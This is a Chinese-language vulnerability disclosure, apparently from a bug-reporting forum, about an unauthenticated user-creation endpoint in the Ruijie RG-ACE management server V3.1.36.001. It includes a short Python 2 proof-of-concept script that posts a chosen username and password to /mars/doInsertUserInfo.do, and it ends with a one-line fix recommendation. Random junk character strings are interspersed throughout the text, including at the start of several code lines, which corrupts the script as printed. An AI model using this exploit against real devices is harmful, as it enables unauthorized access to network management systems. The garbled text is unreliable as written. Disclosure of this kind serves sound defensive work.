锐捷应用控制引擎管理服务器可以增加用户

admin

锐捷应用控制引擎管理服务器（RG-ACE系列应用控制引擎管理服务器V3.1.36.001，官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版）可以根据没有权限验证的接口直接增加用户，连接设备，查看设备信息和报表（权限相对于默认的admin比较低）
* N) p& C. z' g) j& G7 r+ B
$ z% I2 J+ U  _; D& ?- p
测试的具体版本是
产品名称: 锐捷应用控制引擎
' i" p. [" Y5 F$ K; Z) S& x5 n版本号: 3.1.36.001 TC
编译时间: 201104291730
* j( `3 M7 Q% n

2 i8 g5 \& }" j' M; ]8 B! Q漏洞证明：

& t& n6 Z7 {/ w2 h2 E3 m$ E9 ^9 w$ |2 S
) f' a/ X- \. O& C4 \6 V

  m5 Y: |, @1 n6 L

执行脚本
! y- ?, h& I  p/ @+ i0 g# s#! /usr/bin/env python
#coding=gbk
#RG-ACE管理服务器 V3.1.36.001
" G+ o1 |) T) F1 I/ ^* n5 j* rimport urllib2, urllib,cookielib
5 ]0 |/ u8 D: s+ e( G6 ~3 murl=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
4 Y+ u# C+ c( o8 Bopener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
opener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
: [& @' U% f- d! ]; c" y- Spost=(("event","userManager.doInsertUserInfo"),
$ d2 h( _7 d% T9 P("useractionname","addButtonValue"),
("useropermanager","userManager"),
("userName","t"), #######账号自己加
5 F8 H+ k$ O0 X1 \; I2 E/ W9 X("pwd","aaaaaa"),######密码自己加
("trueName","ad"),
$ o# t/ o8 A& F: D, l("email",""),
4 l  b8 H. ?/ Y; T("mobilePhone",""),
("officePhone",""),
("addr",""),
("submit","确定"))
urllib2.install_opener(opener)
, E% D/ H  j  F3 F( Z% V4 C% \. P! Wp=urllib2.urlopen(url, urllib.urlencode(post)).read()
print "Done"
: p  G2 H' z/ o0 f& @
登录，连接设备



" R: z3 u0 _1 ]2 m1 b1 ^4 v
  u  e1 w, i- C! w: R2 B
默认的管理员admin权限更大点
1 c! S9 y+ b5 }% E7 u




修复方案：
; Q1 i8 O) i1 j+ g& ]9 T9 J7 j加强对接口的权限验证